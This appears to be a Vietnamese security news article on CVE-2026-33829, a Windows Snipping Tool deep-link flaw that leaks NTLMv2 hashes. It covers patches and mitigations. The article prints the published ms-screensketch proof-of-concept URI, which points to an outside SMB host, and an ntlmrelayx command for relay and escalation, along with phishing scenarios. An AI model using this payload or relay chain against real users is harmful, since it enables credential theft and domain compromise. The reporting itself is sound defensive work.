- Microsoft vừa vá một lỗ hổng spoofing trong Windows Snipping Tool (CVE-2026-33829): chỉ một cú click vào deep link ms-screensketch độc hại, hash NTLMv2 của người dùng có thể bị gửi sang máy chủ SMB của kẻ tấn công.
- Bản vá đã có trong Patch Tuesday 14/04/2026.
TL;DR
Microsoft đã vá CVE-2026-33829 — lỗ hổng spoofing tầm trung (CVSS 4.3) trong Windows Snipping Tool — trong Patch Tuesday ngày 14/04/2026. Lỗi nằm ở chỗ công cụ không validate tham số filePath của deep link ms-screensketch:, cho phép kẻ tấn công ép Windows mở kết nối SMB tới máy chủ do chúng kiểm soát và âm thầm lộ hash Net-NTLMv2 của nạn nhân. Hành động cần thiết: cài ngay KB5082200 (Win10 22H2), KB5083769 (Win11 24H2/25H2), hoặc bản KB tương ứng cho Windows Server 2012–2025.
Có gì mới
Lỗ hổng được nhà nghiên cứu Margaruga thuộc BlackArrowSec Red Team (Tarlogic) phát hiện và báo cho MSRC. Điểm thú vị: đây là lần đầu tiên một ứng dụng mặc định cỡ “vô hại” như Snipping Tool trở thành vector coerced-authentication trên Windows. Công cụ đăng ký một URI scheme tên ms-screensketch — một deep link cho phép mở Snipping Tool từ trình duyệt hoặc email — nhưng không kiểm tra giá trị tham số filePath trước khi truy cập. Kẻ tấn công có thể chèn một đường UNC trỏ tới máy chủ SMB của chúng, và Windows sẽ thực hiện bắt tay NTLM trong nền.
Vì sao lỗ hổng này đáng chú ý
Hash Net-NTLMv2 là “tấm vé” yêu thích của các red team và nhóm tấn công trên môi trường Active Directory. Sau khi có hash, kẻ tấn công có thể:
- Crack offline bằng Hashcat để lấy mật khẩu cleartext, đặc biệt với mật khẩu yếu hoặc ngắn.
- Relay hash bằng
ntlmrelayxsang dịch vụ LDAP, SMB, HTTP/EWS, ADCS để leo thang đặc quyền hoặc di chuyển ngang (lateral movement). - Thu thập thông tin AD nếu máy mục tiêu có quyền domain user.
Bề mặt tấn công mở rộng đáng kể: chỉ cần một email phishing có link ms-screensketch:, một landing page có auto-redirect, hoặc thậm chí một toast notification — người dùng click, Snipping Tool mở ra bình thường, hash đã bay đi từ trước.
Chi tiết kỹ thuật
| Thuộc tính | Giá trị |
|---|---|
| CVE ID | CVE-2026-33829 |
| CVSS v3.1 | 4.3 Medium (AV:N/AC:L/PR:N/UI:R/C:L/I:N/A:N) |
| CWE | CWE-200 (Exposure of Sensitive Information) |
| Component | Windows Snipping Tool — ms-screensketch URI handler |
| Root cause | Thiếu validate tham số filePath |
| Tác động | Lộ hash Net-NTLMv2 qua SMB (port 445) |
| Exploit maturity | Unproven — MSRC đánh giá khả năng khai thác thực tế “Unlikely” |
| Phát hiện bởi | Margaruga — BlackArrowSec / Tarlogic |
| Patch | KB5082200 (Win10 22H2), KB5083769 (Win11 24H2/25H2) |
Payload PoC mà BlackArrowSec công bố:
ms-screensketch:edit?&filePath=\\snip.blackarrow.lab\file.png&isTemporary=false&saved=true&source=ToastKhi URI trên được kích hoạt, Windows giải quyết đường UNC \\snip.blackarrow.lab\file.png → gửi bắt tay NTLM tới máy chủ SMB của kẻ tấn công. Snipping Tool vẫn hiện UI “edit image” như bình thường, nên nạn nhân không thấy dấu hiệu bất thường.
So sánh với các lỗ hổng cùng lớp
- CVE-2023-28303 “Acropalypse” — cũng ở Snipping Tool / Snip & Sketch, nhưng là lỗi crop ảnh làm lộ pixel bị “xóa”. Vi phạm quyền riêng tư, không ảnh hưởng credential.
- CVE-2023-23397 (Outlook NTLM) — cùng lớp “coerced SMB → NTLM relay”, nhưng qua thuộc tính
PidLidReminderFileParametercủa calendar item. Bị khai thác thực tế bởi APT28. - CVE-2026-32183 — lỗi RCE cũng trên Snipping Tool, vá cùng chu kỳ 14/04/2026, nhưng mức độ nguy hiểm cao hơn và yêu cầu ngữ cảnh cục bộ.
Điểm khác biệt của 33829: nó mở rộng pattern tấn công NTLM sang một ứng dụng mà phần lớn admin chưa từng coi là attack surface, đồng thời chỉ cần một cú click để kích hoạt.
Kịch bản tấn công thực tế
- Phishing email doanh nghiệp: kèm link “xem ảnh chụp màn hình báo cáo” dạng
ms-screensketch:edit?.... Người dùng click → hash rò rỉ. - Landing page độc hại: auto-redirect sang deep link khi nạn nhân truy cập. Snipping Tool mở ra, nạn nhân tưởng là quảng cáo lỗi, đóng đi — hash đã đi.
- Toast notification social engineering: payload PoC còn đặt
source=Toastđể giả như thông báo hợp lệ từ Windows. - Red team engagement: kết hợp với
ntlmrelayx -t ldap://dc --add-computerđể tạo máy tính domain, sau đó leo thang qua RBCD.
Giới hạn & pricing
Lỗ hổng không phải worm-able — bắt buộc có user interaction. Tác động giới hạn ở confidentiality: chỉ lộ hash, không phải full credential. Một số mitigation bổ sung ngoài patch:
- Chặn outbound SMB (TCP/445) tại firewall biên — best practice đã được Microsoft khuyến nghị từ lâu.
- Bật SMB signing và cân nhắc Extended Protection for Authentication (EPA) trên dịch vụ nhạy cảm.
- Triển khai GPO
RestrictSendingNTLMTrafficđể giới hạn đích NTLM hợp lệ. - Nếu có thể, tiến tới Kerberos-only bằng cách tắt NTLM theo roadmap Microsoft 2024–2027.
Patch miễn phí, phân phối qua Windows Update hoặc Microsoft Update Catalog.
Chuyện gì sẽ xảy ra tiếp theo
BlackArrowSec đã public PoC trên GitHub, nên khả năng các bộ phishing template tích hợp URI ms-screensketch: sẽ xuất hiện trong vài tuần tới. Admin nên: (1) deploy bản cập nhật tháng 04/2026 cumulative cho toàn bộ endpoint Windows 10/11 và Server 2012–2025; (2) audit log Windows Event ID 4624/4625 tìm dấu hiệu NTLM authentication lạ; (3) rà lại rule firewall chặn SMB outbound. Nếu bạn quản lý red team, URI này đáng thêm vào playbook bên cạnh search-ms:, ms-officecmd:, và các protocol handler thường bị lạm dụng.
Nguồn: CybersecurityNews, BlackArrowSec PoC, OffSeq Threat Radar.